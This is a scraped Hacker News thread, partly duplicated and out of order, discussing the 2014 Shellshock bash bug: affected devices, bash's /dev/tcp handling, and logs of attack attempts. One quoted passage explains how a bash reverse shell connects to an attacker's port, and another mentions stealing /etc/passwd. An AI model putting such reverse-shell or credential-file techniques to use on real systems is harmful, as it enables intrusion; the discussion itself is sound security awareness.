I would just like to point out that, for all the talk of routers being vunerable, routers in general use busybox, which in turn uses ash shell as the default shell. Most routers will not be vunerable unless bash was explicitly installed.
Whilst this is true, many NAS boxes do remain vulnerable and tend to have features that encourage users to make them world accessible (such as media servers).
That's just openwrt. Other than VxWorks or QNX based hardware, a ton of network-connected devices ship with bash. Some even use it for their web interface backend.
Not only that. But if you're going to make a web interface available externally you're kinda asking for it. Whether it's Shellshock or not, you shouldn't let anyone but admins see admin interfaces. Restrict SSH and web access as much as possible.
"Many people are unaware that BASH actually has built-in commands for sending and receiving network traffic. They work similarly to netcat, but without requiring any other malware or supporting tools to be present on the system. The example above shows how to create an extremely useful reverse shell, just using BASH itself. Through a clever bit of advanced BASH syntax, it calls a second BASH shell, which it then binds to a network socket connected to the attacker’s IP on port 3333. Because this second shell is called with the ‘-i’ option (for “interactive” mode), it provides full two-way communication to the attacker, operating much as a normal command line shell would. The attacker has merely to listen on the correct port in order to receive a full interactive shell on the victim system."
Maybe I'm seeing this wrong, but isn't the /dev filesystem provided by the kernel?
While you are right that /dev is typically a filesystem provided by the kernel (these days, previously it was a normal "static" filesystem), bash specifically handles various filenames under /dev when used in redirection, including /dev/tcp and /dev/udp. See http://www.gnu.org/software/bash/manual/bashref.html#Redirec...
> isn't the /dev filesystem provided by the kernel?
It is, but for /dev/tcp bash isn't really using it - that gets translated instead to internal socket handling code (i.e. nothing gets created/accessed in the real /dev) much like when you use "echo" - bash uses its built-in by default instead of forking to the external command of that name.
For the "Stealing the Password File" attack what they're actually getting is a list of users, not the hashed passwords. Hashed passwords are stored in /etc/shadow in all recent (at least early 90s) systems.
This is still bad since they now will have a list of possible usernames on the system but not nearly as bad as getting access to the hashed passwords as well.
So I booted and put up my servers just for the heck of it since there's nothing I could care about being hacked in it. I was anyways going to wipe the servers and start from scratch. Discovered quite a fun log today.
Basically several hackers have gotten in, installed wordpress, (and the whole apache mysql php stack with it) and done a bunch of other stuff and left without a trace (except for the log of course). Crazy stuff. I'm wondering how many other websites have been hacked and aren't even bothering to check on it.
I've only seen 7 probes across a couple webservers in the whole time that this has been out. It's possible that they're not putting it a place that I'd be seeing it in the logs. But overall, I'm not seeing a huge population of scanners.
To add a similar experience, I've seen 8 attempts—5 (all unique origins) on the 25th, 3 (same origin) on the 26th. This on an effectively zero traffic machine.
[+] [-] conexions|11 years ago|reply
https://forum.openwrt.org/viewtopic.php?id=52937
[+] [-] buro9|11 years ago|reply
I was tracking the changelog for the QNAP one that I use and was pleased to see that they didn't take too long to patch it: http://www.qnap.com/i/en/product_x_down/firmware_log.php?kw=...
[+] [-] peterwwillis|11 years ago|reply
Your office printers are probably vulnerable to this bug. So are medical devices, SANs, network switches, IP phones, cars, SCADA systems ... you name the device, I can probably name a vendor that ships bash on it. Here are the Cisco and Juniper devices affected: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10... http://tools.cisco.com/security/center/content/CiscoSecurity...
[+] [-] smutticus|11 years ago|reply
[+] [-] JetSpiegel|11 years ago|reply
Maybe I'm seeing this wrong, but isn't the /dev filesystem provided by the kernel?
[+] [-] znep|11 years ago|reply
[+] [-] dspillett|11 years ago|reply
It is, but for /dev/tcp bash isn't really using it - that gets translated instead to internal socket handling code (i.e. nothing gets created/accessed in the real /dev) much like when you use "echo" - bash uses its built-in by default instead of forking to the external command of that name.
[+] [-] hjlklhj|11 years ago|reply
This is still bad since they now will have a list of possible usernames on the system but not nearly as bad as getting access to the hashed passwords as well.
[+] [-] danielweber|11 years ago|reply
[+] [-] wut42|11 years ago|reply
[+] [-] nightbrawler|11 years ago|reply
[+] [-] nstart|11 years ago|reply
Basically several hackers have gotten in, installed wordpress, (and the whole apache mysql php stack with it) and done a bunch of other stuff and left without a trace (except for the log of course). Crazy stuff. I'm wondering how many other websites have been hacked and aren't even bothering to check on it.
[+] [-] unknown|11 years ago|reply
[deleted]
[+] [-] ewest|11 years ago|reply
[+] [-] unknown|11 years ago|reply
[deleted]
[+] [-] wiredfool|11 years ago|reply
[+] [-] sisk|11 years ago|reply
[+] [-] 0xdeadbeefbabe|11 years ago|reply
[1] https://www.virustotal.com/en/file/2ff32fcfee5088b14ce6c96cc...
[+] [-] kethinov|11 years ago|reply
"That's not nice :("
https://twitter.com/hnstatus/status/515299364080590848
[+] [-] danielweber|11 years ago|reply